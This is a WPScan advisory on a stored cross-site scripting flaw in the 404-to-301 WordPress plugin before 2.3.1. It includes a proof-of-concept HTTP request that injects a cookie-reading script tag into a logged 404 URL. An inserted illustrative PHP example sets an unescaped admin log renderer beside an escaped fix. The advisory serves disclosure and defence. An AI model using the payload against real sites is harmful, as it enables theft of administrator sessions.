404 to 301 <= 2.3.0 - Unauthenticated Stored Cross-Site Scripting (XSS)


Description
There is a stored XSS in the 404-to-301 WP plugin < 2.3.1. Unauthenticated users can visit a specially crafted URL and the redirect path will be logged to the database. The redirection source is stored unescaped in the database, thus it is served as-is and evaluated in the browsers of logged-in admins when they check the redirection logs on http://wordpress/wp-admin/admin.php?page=i4t3-logs. Affected versions are <2.3.1.

Proof of Concept
A request similar to the following must be sent to the vulnerable server. Make sure to request a page that serves a 404, e.g. by requesting a post with a nonexistent post ID.

GET /?p=99999999999999999929"><script>alert(document.cookie)</script> HTTP/1.1
Host: wordpress
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
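To make the defect concrete, the following is an added illustrative example and not the 404-to-301 plugin's own code: function names, the log table name and the row layout are hypothetical, and it assumes it runs inside WordPress (is_404, wp_unslash, $wpdb, esc_html, esc_url). It shows a 404 logger that stores the raw request path, the vulnerable admin rendering that echoes it as-is, and the output escaping that closes the hole.

```php
<?php
// Illustrative example only; not code from the 404-to-301 plugin.
// Hypothetical names: i4t3_example_log_404(), i4t3_example_get_rows(),
// i4t3_example_render_log_vulnerable(), i4t3_example_render_log_fixed(),
// and the table {$wpdb->prefix}example_404_log.

// Front-end side: on a 404, record the request path exactly as the client sent it.
// Storing the raw value is acceptable; the bug class here is unescaped output.
function i4t3_example_log_404() {
    global $wpdb;
    if ( ! is_404() ) {
        return;
    }
    $wpdb->insert(
        $wpdb->prefix . 'example_404_log',
        array(
            'url'  => wp_unslash( $_SERVER['REQUEST_URI'] ), // attacker-controlled
            'ref'  => isset( $_SERVER['HTTP_REFERER'] ) ? wp_unslash( $_SERVER['HTTP_REFERER'] ) : '',
            'date' => current_time( 'mysql' ),
        ),
        array( '%s', '%s', '%s' )
    );
}

// Fetch the most recent entries for the admin log page.
function i4t3_example_get_rows() {
    global $wpdb;
    $table = $wpdb->prefix . 'example_404_log';
    return $wpdb->get_results( "SELECT url, ref, date FROM {$table} ORDER BY date DESC LIMIT 50" );
}

// Vulnerable admin rendering: the stored path is concatenated straight into HTML,
// so a logged path such as /?p=1"><script>...</script> becomes live markup in the
// browser of whichever administrator opens the log page.
function i4t3_example_render_log_vulnerable( array $rows ) {
    foreach ( $rows as $row ) {
        echo '<tr><td>' . $row->url . '</td><td>' . $row->ref . '</td></tr>';
    }
}

// Hardened rendering: escape on output for the context the value lands in.
// esc_html() for text content, esc_url() for the href attribute.
function i4t3_example_render_log_fixed( array $rows ) {
    foreach ( $rows as $row ) {
        echo '<tr><td>' . esc_html( $row->url ) . '</td>';
        echo '<td><a href="' . esc_url( $row->ref ) . '">' . esc_html( $row->ref ) . '</a></td></tr>';
    }
}
```

The same pattern applies to any other request-derived field the log page displays (referrer, user agent, IP); each must be escaped for its output context, regardless of how it was stored.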

Affects

Plugin 404-to-301
fixed in version 2.3.1

References

URL https://gist.github.com/ldionmarcil/6793df929449f8781bb1e213d7e75e23
URL https://github.com/joel-james/404-to-301/commit/7a4e2798eca79828c1611988289e06b6d9c18b61
URL https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_404_to_301_wordpress_plugin.html
URL http://seclists.org/fulldisclosure/2016/Nov/46

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter ldionmarcil
Submitter Website https://keybase.io/ldionmarcil
Submitter Twitter https://twitter.com/ldionmarcil
Views 308
Verified No
WPVDB ID 8611

Timeline

Publicly Published 2016-08-27 (3 months ago)
Added 2016-08-29 (3 months ago)
Last Updated 2016-11-08 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.